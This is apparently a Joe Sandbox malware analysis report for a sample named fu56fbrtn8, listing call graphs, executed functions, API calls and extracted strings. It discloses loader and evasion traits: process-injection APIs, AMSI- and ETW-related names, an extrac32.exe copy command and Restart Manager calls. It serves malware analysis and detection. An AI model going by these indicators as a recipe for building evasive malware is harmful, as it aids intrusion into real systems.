GetFileAttributesA 85920->85921 85922 2de7e2d 85921->85922 85922->85502 85922->85503 85924 2de4b90 11 API calls 85923->85924 85927 2dfc764 85924->85927 85925 2dfc785 85925->85599 85926 2de49bc 11 API calls 85926->85927 85927->85925 85927->85926 85929 2dfc40e 85928->85929 85947 2de4ee4 85929->85947 85931 2dfc416 85932 2dfc436 RtlDosPathNameToNtPathName_U 85931->85932 85953 2dfc340 85932->85953 85934 2dfc452 NtCreateFile 85935 2dfc47d 85934->85935 85936 2de49bc 11 API calls 85935->85936 85937 2dfc48f NtWriteFile NtClose 85936->85937 85938 2dfc4b9 85937->85938 85954 2de4c24 85938->85954 85941 2de44a0 11 API calls 85942 2dfc4c9 85941->85942 85942->85502 85943->85358 85944->85905 85945->85913 85946->85913 85948 2de4eea SysAllocStringLen 85947->85948 85949 2de4f00 85947->85949 85948->85949 85950 2de4bf4 85948->85950 85949->85931 85951 2de4c10 85950->85951 85952 2de4c00 SysAllocStringLen 85950->85952 85951->85931 85952->85950 85952->85951 85953->85934 85955 2de4c2a SysFreeString 85954->85955 85956 2de4c38 85954->85956 85955->85956 85956->85941 85957 2de4ea0 85958 2de4ead 85957->85958 85961 2de4eb4 85957->85961 85966 2de4bf4 SysAllocStringLen 85958->85966 85963 2de4c14 85961->85963 85964 2de4c1a SysFreeString 85963->85964 85965 2de4c20 85963->85965 85964->85965 85966->85961 85967 2de4c60 85968 2de4c87 85967->85968 85969 2de4c64 85967->85969 85970 2de4c24 85969->85970 85973 2de4c77 SysReAllocStringLen 85969->85973 85971 2de4c2a SysFreeString 85970->85971 85972 2de4c38 85970->85972 85971->85972 85973->85968 85974 2de4bf4 85973->85974 85975 2de4c10 85974->85975 85976 2de4c00 SysAllocStringLen 85974->85976 85976->85974 85976->85975

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 02DFD5D0 Relevance: 218.7, APIs: 9, Strings: 111, Instructions: 8669COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InetIsOffline.URL(00000000,00000000,02E08FB6,?,?,?,00000000,00000000), ref: 02DFD604
                                                                                                                                                      • Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
                                                                                                                                                      • Part of subcall function 02DE7E18: GetFileAttributesA.KERNEL32(00000000,?,02DFE0EE,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanString,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,UacInitialize), ref: 02DE7E23
                                                                                                                                                      • Part of subcall function 02DEC320: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E455F0,?,02DFE40F,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanBuffer,02E45344,02E08FEC,OpenSession), ref: 02DEC337
                                                                                                                                                      • Part of subcall function 02DFC4DC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DFC5AC), ref: 02DFC517
                                                                                                                                                      • Part of subcall function 02DFC4DC: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DFC5AC), ref: 02DFC547
                                                                                                                                                      • Part of subcall function 02DFC4DC: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DFC55C
                                                                                                                                                      • Part of subcall function 02DFC4DC: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DFC588
                                                                                                                                                      • Part of subcall function 02DFC4DC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DFC591
                                                                                                                                                      • Part of subcall function 02DE7E3C: GetFileAttributesA.KERNEL32(00000000,?,02E01133,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanBuffer,02E45344,02E08FEC,ScanString), ref: 02DE7E47
                                                                                                                                                      • Part of subcall function 02DE8004: CreateDirectoryA.KERNEL32(00000000,00000000,?,02E01324,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,Initialize,02E45344,02E08FEC,ScanString,02E45344,02E08FEC), ref: 02DE8011
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryRead
                                                                                                                                                    • String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                                    • API String ID: 2725267379-582383607
                                                                                                                                                    • Opcode ID: c34cbd7f604b5dcbb0c0123b4e7d0810f1bf529b18022008a3ef3fb092333aac
                                                                                                                                                    • Instruction ID: afb9984635c0a19db7822fba2bdade577ef4670b758fd870875bcf647d710abf
                                                                                                                                                    • Opcode Fuzzy Hash: c34cbd7f604b5dcbb0c0123b4e7d0810f1bf529b18022008a3ef3fb092333aac
                                                                                                                                                    • Instruction Fuzzy Hash: 1304D834A902588BDF10FB65DC80ADE73B7EB85700F5095E5A50AAB354DB70AEC2CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,1568E9E1), ref: 1569CB65
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CB6E
                                                                                                                                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,1568E9E1), ref: 1569CB85
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CB88
                                                                                                                                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,1568E9E1), ref: 1569CB9A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CB9D
                                                                                                                                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,1568E9E1), ref: 1569CBAE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CBB1
                                                                                                                                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,1568E9E1), ref: 1569CBC3
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CBC6
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,1568E9E1), ref: 1569CBD2
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CBD5
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,1568E9E1), ref: 1569CBE6
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CBE9
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,1568E9E1), ref: 1569CBFA
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CBFD
                                                                                                                                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,1568E9E1), ref: 1569CC0E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC11
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,1568E9E1), ref: 1569CC22
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC25
                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,1568E9E1), ref: 1569CC36
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC39
                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,1568E9E1), ref: 1569CC4A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC4D
                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,1568E9E1), ref: 1569CC5E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC61
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,1568E9E1), ref: 1569CC72
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC75
                                                                                                                                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,1568E9E1), ref: 1569CC83
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC86
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,1568E9E1), ref: 1569CC97
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC9A
                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,1568E9E1), ref: 1569CCA7
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CCAA
                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,1568E9E1), ref: 1569CCB7
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CCBA
                                                                                                                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,1568E9E1), ref: 1569CCCC
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CCCF
                                                                                                                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,1568E9E1), ref: 1569CCDC
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CCDF
                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,1568E9E1), ref: 1569CCF0
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CCF3
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,1568E9E1), ref: 1569CD04
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CD07
                                                                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,1568E9E1), ref: 1569CD19
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CD1C
                                                                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,1568E9E1), ref: 1569CD29
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CD2C
                                                                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,1568E9E1), ref: 1569CD39
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CD3C
                                                                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,1568E9E1), ref: 1569CD49
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CD4C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                    • API String ID: 4236061018-3687161714
                                                                                                                                                    • Opcode ID: 721de2ec1eeb828821f7a60f870770a7d1e1c76e06971d17fcc60401dd5bd8b3
                                                                                                                                                    • Instruction ID: bab711684539250f4f4e96354ac4344f1b77650b951ea60933c19b96144f3b89
                                                                                                                                                    • Opcode Fuzzy Hash: 721de2ec1eeb828821f7a60f870770a7d1e1c76e06971d17fcc60401dd5bd8b3
                                                                                                                                                    • Instruction Fuzzy Hash: 574186B0C1336C6AEB10EBB6CCADD5B3EACE9856953410A1BF514A7509DE399800CFF4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02E05FA0 Relevance: 142.6, APIs: 3, Strings: 77, Instructions: 2643COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 4527 2e05fa0-2e0618a call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 4582 2e06190-2e0638f call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de48b0 4527->4582 4583 2e0618b call 2df7be8 4527->4583 4642 2e06b54-2e06cd7 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de48b0 4582->4642 4643 2e06395-2e069b4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de2ee0 call 2de2f08 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 GetCurrentProcess call 2df7968 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 4582->4643 4583->4582 4732 2e074a8-2e08b96 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 * 16 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 ExitProcess 4642->4732 4733 2e06cdd-2e06cec call 2de48b0 4642->4733 5169 2e069b6-2e069b9 4643->5169 5170 2e069bb-2e06b4f call 2de49bc call 2dfc5bc call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 EnumSystemLocalesA 4643->5170 4733->4732 4741 2e06cf2-2e06fc5 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfd198 call 2de4824 call 2de4964 call 2de4698 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de7e18 4733->4741 4984 2e072a2-2e074a3 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de49bc call 2df7f48 4741->4984 4985 2e06fcb-2e0729d call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfc74c call 2de44f4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4da4 * 2 call 2de4728 call 2dfc3f8 4741->4985 4984->4732 4985->4984 5169->5170 5170->4642
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
                                                                                                                                                      • Part of subcall function 02DE2EE0: QueryPerformanceCounter.KERNEL32 ref: 02DE2EE4
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,17D78400,00001000,00000040,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,ScanBuffer,02E45344,02E08FEC), ref: 02E0681D
                                                                                                                                                      • Part of subcall function 02DF7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02DF7975
                                                                                                                                                      • Part of subcall function 02DF7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02DF797B
                                                                                                                                                      • Part of subcall function 02DF7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DF799B
                                                                                                                                                    • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(15680000,00000000,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344), ref: 02E06B4F
                                                                                                                                                      • Part of subcall function 02DE7E18: GetFileAttributesA.KERNEL32(00000000,?,02DFE0EE,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanString,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,UacInitialize), ref: 02DE7E23
                                                                                                                                                      • Part of subcall function 02DFC3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DFC4CA), ref: 02DFC437
                                                                                                                                                      • Part of subcall function 02DFC3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DFC471
                                                                                                                                                      • Part of subcall function 02DFC3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DFC49E
                                                                                                                                                      • Part of subcall function 02DFC3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DFC4A7
                                                                                                                                                    • ExitProcess.KERNEL32(00000000,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,Initialize,02E45344,02E08FEC,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC), ref: 02E08B96
                                                                                                                                                      • Part of subcall function 02DE4C24: SysFreeString.OLEAUT32(02DFD42C), ref: 02DE4C32
                                                                                                                                                      • Part of subcall function 02DE4C3C: SysFreeString.OLEAUT32 ref: 02DE4C4F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
